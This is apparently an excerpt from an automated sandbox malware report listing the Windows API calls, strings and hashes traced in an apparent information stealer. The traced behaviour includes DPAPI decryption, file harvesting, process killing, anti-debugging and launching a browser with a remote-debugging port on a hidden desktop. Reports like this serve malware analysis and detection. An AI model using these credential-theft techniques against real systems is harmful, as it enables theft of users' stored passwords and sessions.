                                                    • String ID: hSC
                                                    • API String ID: 2413810636-3351665975
                                                    • Opcode ID: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
                                                    • Instruction ID: 8e26f81a12063ac0f5bdae1f1a5e528bdd186a2543b6e32817db5f417ad0c564
                                                    • Opcode Fuzzy Hash: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
                                                    • Instruction Fuzzy Hash: 6C0281B0A21255AFDB21EF74DC48AAEBFB6AF04704F14541AF805E7251DBB4D902DFA0
                                                    APIs
                                                    • GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 024A6680
                                                    • GetProcAddress.KERNEL32(006390E0,00638E44), ref: 024A6699
                                                    • GetProcAddress.KERNEL32(006390E0,00638A64), ref: 024A66B1
                                                    • GetProcAddress.KERNEL32(006390E0,00638A50), ref: 024A66C9
                                                    • GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 024A66E2
                                                    • GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 024A66FA
                                                    • GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 024A6712
                                                    • GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 024A672B
                                                    • GetProcAddress.KERNEL32(006390E0,00638D48), ref: 024A6743
                                                    • GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 024A675B
                                                    • GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 024A6774
                                                    • GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 024A678C
                                                    • GetProcAddress.KERNEL32(006390E0,006388B0), ref: 024A67A4
                                                    • GetProcAddress.KERNEL32(006390E0,00638D98), ref: 024A67BD
                                                    • GetProcAddress.KERNEL32(006390E0,00638A24), ref: 024A67D5
                                                    • GetProcAddress.KERNEL32(006390E0,00638C18), ref: 024A67ED
                                                    • GetProcAddress.KERNEL32(006390E0,00638E34), ref: 024A6806
                                                    • GetProcAddress.KERNEL32(006390E0,006388BC), ref: 024A681E
                                                    • GetProcAddress.KERNEL32(006390E0,0063892C), ref: 024A6836
                                                    • GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 024A684F
                                                    • LoadLibraryA.KERNEL32(00638D50,?,?,?,024A1E4A), ref: 024A6860
                                                    • LoadLibraryA.KERNEL32(0063897C,?,?,?,024A1E4A), ref: 024A6872
                                                    • LoadLibraryA.KERNEL32(00638904,?,?,?,024A1E4A), ref: 024A6884
                                                    • LoadLibraryA.KERNEL32(006389DC,?,?,?,024A1E4A), ref: 024A6895
                                                    • LoadLibraryA.KERNEL32(00638B28,?,?,?,024A1E4A), ref: 024A68A7
                                                    • GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 024A68C4
                                                    • GetProcAddress.KERNEL32(00639020,00638C24), ref: 024A68E0
                                                    • GetProcAddress.KERNEL32(00639020,006389CC), ref: 024A68F8
                                                    • GetProcAddress.KERNEL32(00639114,00638B94), ref: 024A6914
                                                    • GetProcAddress.KERNEL32(00638FD4,00638928), ref: 024A6930
                                                    • GetProcAddress.KERNEL32(00639004,00638C14), ref: 024A694C
                                                    • GetProcAddress.KERNEL32(00639004,00435864), ref: 024A6963
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 2238633743-0
                                                    • Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                    • Instruction ID: d3c5e250df2fc17aceb43c6c9b629cf420937abcaa28ed06926a1dbf0a7f5447
                                                    • Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                    • Instruction Fuzzy Hash: DDA16EB9A117009FD758DF65EE88A6637BBF789744300A51EF94683360DBB4A900DFB0
                                                    APIs
                                                    • memset.MSVCRT ref: 004097C4
                                                    • lstrcatA.KERNEL32(?,?), ref: 004097D8
                                                    • lstrcatA.KERNEL32(?,?), ref: 004097ED
                                                    • lstrcatA.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00409800
                                                    • memset.MSVCRT ref: 00409815
                                                      • Part of subcall function 00423E10: lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
                                                      • Part of subcall function 00423E10: lstrcpy.KERNEL32(00000000,0094A758), ref: 00423E6F
                                                      • Part of subcall function 00423E10: GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79
                                                    • wsprintfA.USER32 ref: 00409846
                                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409869
                                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409888
                                                    • memset.MSVCRT ref: 004098A6
                                                    • lstrcatA.KERNEL32(?,?,?,00000000,00000103), ref: 004098BB
                                                    • lstrcatA.KERNEL32(?,?), ref: 004098CD
                                                    • lstrcatA.KERNEL32(?,00435128), ref: 004098DD
                                                    • memset.MSVCRT ref: 004098F2
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040991A
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00409950
                                                    • StrStrA.SHLWAPI(?,0094E700), ref: 00409965
                                                    • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00409982
                                                    • lstrlenA.KERNEL32(?), ref: 00409996
                                                    • wsprintfA.USER32 ref: 004099A6
                                                    • lstrcpy.KERNEL32(?,?), ref: 004099BD
                                                    • memset.MSVCRT ref: 004099D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$memset$lstrcpy$Desktopwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
                                                    • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                                    • API String ID: 3051782728-1862457068
                                                    • Opcode ID: f6a372755e89e9bbecdb42024b4003873e3369633ad2a61d7c9caed0c3de9774
                                                    • Instruction ID: d19577a6994188075af4459c382a0e83ee01d0c412b4f1100e7ad714e1588002
                                                    • Opcode Fuzzy Hash: f6a372755e89e9bbecdb42024b4003873e3369633ad2a61d7c9caed0c3de9774
                                                    • Instruction Fuzzy Hash: 6091B5B1214340AFD720EF64DC45F9B77E9AF88704F10892DF649972D1DBB49904CBA6
                                                    APIs
                                                    • wsprintfA.USER32 ref: 0249CF63
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0249CF7A
                                                    • lstrcat.KERNEL32(?,?), ref: 0249CFC6
                                                    • StrCmpCA.SHLWAPI(?,00431D70), ref: 0249CFD8
                                                    • StrCmpCA.SHLWAPI(?,00431D74), ref: 0249CFF2
                                                    • wsprintfA.USER32 ref: 0249D017
                                                    • PathMatchSpecA.SHLWAPI(?,00638D64), ref: 0249D049
                                                    • CoInitialize.OLE32(00000000), ref: 0249D055
                                                      • Part of subcall function 0249CE47: CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 0249CE6D
                                                      • Part of subcall function 0249CE47: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0249CEAD
                                                      • Part of subcall function 0249CE47: lstrcpyn.KERNEL32(?,?,00000104), ref: 0249CF30
                                                    • CoUninitialize.COMBASE ref: 0249D070
                                                    • lstrcat.KERNEL32(?,?), ref: 0249D095
                                                    • lstrlen.KERNEL32(?), ref: 0249D0A2
                                                    • StrCmpCA.SHLWAPI(?,0042D01C), ref: 0249D0BC
                                                    • wsprintfA.USER32 ref: 0249D0E4
                                                    • wsprintfA.USER32 ref: 0249D103
                                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 0249D117
                                                    • wsprintfA.USER32 ref: 0249D13F
                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0249D158
                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0249D177
                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 0249D18F
                                                    • CloseHandle.KERNEL32(00000000), ref: 0249D19A
                                                    • CloseHandle.KERNEL32(00000000), ref: 0249D1A6
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0249D1BB
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249D1FB
                                                    • FindNextFileA.KERNEL32(?,?), ref: 0249D2F4
                                                    • FindClose.KERNEL32(?), ref: 0249D306
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                                    • String ID:
                                                    • API String ID: 3860919712-0
                                                    • Opcode ID: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
                                                    • Instruction ID: 2ac1a4589ba0f14eb43f8c1f9015503a6300fe3efcb3c5577d3be51cf527dd77
                                                    • Opcode Fuzzy Hash: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
                                                    • Instruction Fuzzy Hash: 6DC17571900259AFDF54EF64DC44FEE7B7AAF48304F00455AF909A7290EB749A85CFA0
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481849
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481880
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024818D3
                                                    • lstrcat.KERNEL32(00000000), ref: 024818DD
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02481909
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481A5A
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02481A65
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat
                                                    • String ID:
                                                    • API String ID: 2276651480-0
                                                    • Opcode ID: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
                                                    • Instruction ID: e8ca15bc756997b6640a1a91c7b65a5ea681972278870628fc0771c1d46fa18d
                                                    • Opcode Fuzzy Hash: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
                                                    • Instruction Fuzzy Hash: 4A815671921295ABDB21FF75CC84A9E7BB6AF44308F04012BEC09A7251D774DD42DF60
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0249E0CF
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0249E0D6
                                                    • wsprintfA.USER32 ref: 0249E0EE
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0249E107
                                                    • StrCmpCA.SHLWAPI(?,00431D70), ref: 0249E125
                                                    • StrCmpCA.SHLWAPI(?,00431D74), ref: 0249E140
                                                    • wsprintfA.USER32 ref: 0249E160
                                                    • DeleteFileA.KERNEL32(?), ref: 0249E1B4
                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0249E17B
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 0248169E
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816C0
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816E2
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 02481746
                                                      • Part of subcall function 0249DD07: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0249DD62
                                                      • Part of subcall function 0249DD07: lstrcpy.KERNEL32(00000000,?), ref: 0249DD95
                                                      • Part of subcall function 0249DD07: lstrcat.KERNEL32(?,00000000), ref: 0249DDA3
                                                      • Part of subcall function 0249DD07: lstrcat.KERNEL32(?,00638B0C), ref: 0249DDBD
                                                      • Part of subcall function 0249DD07: lstrcat.KERNEL32(?,?), ref: 0249DDD1
                                                      • Part of subcall function 0249DD07: lstrcat.KERNEL32(?,00638DD8), ref: 0249DDE5
                                                      • Part of subcall function 0249DD07: lstrcpy.KERNEL32(00000000,?), ref: 0249DE15
                                                      • Part of subcall function 0249DD07: GetFileAttributesA.KERNEL32(00000000), ref: 0249DE1C
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0249E1C3
                                                    • FindClose.KERNEL32(00000000), ref: 0249E1D2
                                                    • lstrcat.KERNEL32(?,00638D24), ref: 0249E1F9
                                                    • lstrcat.KERNEL32(?,00638A2C), ref: 0249E20B
                                                    • lstrlen.KERNEL32(?), ref: 0249E216
                                                    • lstrlen.KERNEL32(?), ref: 0249E225
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E25B
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                                    • String ID:
                                                    • API String ID: 3181694991-0
                                                    • Opcode ID: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
                                                    • Instruction ID: 82f0e9fb5cefda884324fb78e3920b49fc53ff39db2326cebdbceb400e2e9892
                                                    • Opcode Fuzzy Hash: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
                                                    • Instruction Fuzzy Hash: 19514E71614380AFC724EF74DC48A9E7BEAAF88315F00492EF99987290EB74D545CF92
                                                    APIs
                                                    • wsprintfA.USER32 ref: 0249D8C4
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0249D8DB
                                                    • StrCmpCA.SHLWAPI(?,00431D70), ref: 0249D8FB
                                                    • StrCmpCA.SHLWAPI(?,00431D74), ref: 0249D915
                                                    • lstrcat.KERNEL32(?,00638D24), ref: 0249D95A
                                                    • lstrcat.KERNEL32(?,00638BF8), ref: 0249D96E
                                                    • lstrcat.KERNEL32(?,?), ref: 0249D982
                                                    • lstrcat.KERNEL32(?,?), ref: 0249D993
                                                    • lstrcat.KERNEL32(?,00431D64), ref: 0249D9A5
                                                    • lstrcat.KERNEL32(?,?), ref: 0249D9B9
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249D9F9
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249DA49
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0249DAAE
                                                    • FindClose.KERNEL32(00000000), ref: 0249DABD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                                    • String ID:
                                                    • API String ID: 50252434-0
                                                    • Opcode ID: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
                                                    • Instruction ID: 1784398f53f7aa5b8cf7f18fa29fbade04fab2ddfd1e6a5fc5cab88af32c9ac2
                                                    • Opcode Fuzzy Hash: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
                                                    • Instruction Fuzzy Hash: 65615671D10259AFCF14FF74CC84ADE7BBAAF48304F00459AE949A7250EB74AA55CFA0
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246D9
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004246E9
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004246FB
                                                    • StrCmpCA.SHLWAPI(?,?), ref: 0042470D
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424722
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00424731
                                                    • CloseHandle.KERNEL32(00000000), ref: 00424738
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00424746
                                                    • CloseHandle.KERNEL32(00000000), ref: 00424751
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                    • String ID:
                                                    • API String ID: 3836391474-0
                                                    • Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                    • Instruction ID: acde96e121e2a7afcea3315a204f3f85e54aecaf4105e29a1c9688e5f6c36e20
                                                    • Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                    • Instruction Fuzzy Hash: 6301A1316012246BE7205B60AC88FFB777DEB85B81F00109DF90596280EFB499408FB4
                                                    APIs
                                                      • Part of subcall function 024A7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 024A7495
                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 024A2FA2
                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 024A2FB4
                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 024A2FC1
                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 024A2FF3
                                                    • LocalFree.KERNEL32(00000000), ref: 024A31D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                    • String ID: /
                                                    • API String ID: 3090951853-4001269591
                                                    • Opcode ID: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
                                                    • Instruction ID: b7f1c8c9bc248a8013e565e5dca05a49fa78fe171051a345386d17ab6826f4b9
                                                    • Opcode Fuzzy Hash: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
                                                    • Instruction Fuzzy Hash: 98B12A71904204CFD715CF54C958B99BBF2BB54329F29C1EAD409AB3A1E7769C82CF90
                                                    APIs
                                                    • memset.MSVCRT ref: 0248F022
                                                    • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0248F03D
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0248F045
                                                    • memcpy.MSVCRT(?,?,?), ref: 0248F0B8
                                                    • lstrcat.KERNEL32(0042D01C,0042D01C), ref: 0248F0EE
                                                    • lstrcat.KERNEL32(0042D01C,0042D01C), ref: 0248F110
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                    • String ID:
                                                    • API String ID: 1498829745-0
                                                    • Opcode ID: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
                                                    • Instruction ID: fc926c297a50dfa804f170faad698c2d4d4b2ccf3f58e6dc250d7fd4b5a0daad
                                                    • Opcode Fuzzy Hash: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
                                                    • Instruction Fuzzy Hash: C431B275F00219ABDB109B98EC45BEFB779EB44705F04417AFA09E3240DBB49A04CBE5
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 024A48AF
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 024A48BF
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 024A48D1
                                                    • StrCmpCA.SHLWAPI(?,00435644), ref: 024A48E7
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 024A48F9
                                                    • CloseHandle.KERNEL32(00000000), ref: 024A4904
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 2284531361-0
                                                    • Opcode ID: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
                                                    • Instruction ID: 0797940001ba2569223e637f26a172c16e44b3ef3ab854b60566f5c9f92789f8
                                                    • Opcode Fuzzy Hash: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
                                                    • Instruction Fuzzy Hash: FA014F316012285BE7209B74AC89FEE77ADEF48751F0401DAF908D2150EBB49AA48EE1
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 024A2E49
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A2E50
                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 024A2E5F
                                                    • wsprintfA.USER32 ref: 024A2E8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                    • String ID: wwww
                                                    • API String ID: 3317088062-671953474
                                                    • Opcode ID: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
                                                    • Instruction ID: 21244d80347c35f836a8ffec5671ec2a12afa4c18bcf3d16d9554b2d6d80042a
                                                    • Opcode Fuzzy Hash: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
                                                    • Instruction Fuzzy Hash: D201F771A04614ABC7188F58DC4AB6AB76AE784720F10432AFD16D73C0D7B419008AE5
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 024A8699
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 024A86AE
                                                    • UnhandledExceptionFilter.KERNEL32(0042C2C0), ref: 024A86B9
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 024A86D5
                                                    • TerminateProcess.KERNEL32(00000000), ref: 024A86DC
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 2579439406-0
                                                    • Opcode ID: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
                                                    • Instruction ID: 9b818f1d89edfdadf1d5557fca68222d554db4752980df6714f42190245acb60
                                                    • Opcode Fuzzy Hash: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
                                                    • Instruction Fuzzy Hash: DF21F3B59003069FC760DF15F984A49BBB4FB28304F50603EF51887B61EB7069858F5D
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004076A5
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
                                                    • LocalFree.KERNEL32(?), ref: 004076F7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                    • String ID:
                                                    • API String ID: 3657800372-0
                                                    • Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                    • Instruction ID: fc53f040804026e33a48c705a0d2581fa71e9ff24b93ea351c491559a1666898
                                                    • Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                    • Instruction Fuzzy Hash: 3A011E75B40318BBEB14DBA49C4AFAA7779EB44B15F104159FB09EB2C0D6B0A9008BE4
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 02487905
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0248790C
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02487934
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 02487954
                                                    • LocalFree.KERNEL32(?), ref: 0248795E
                                                    Memory Dump Source
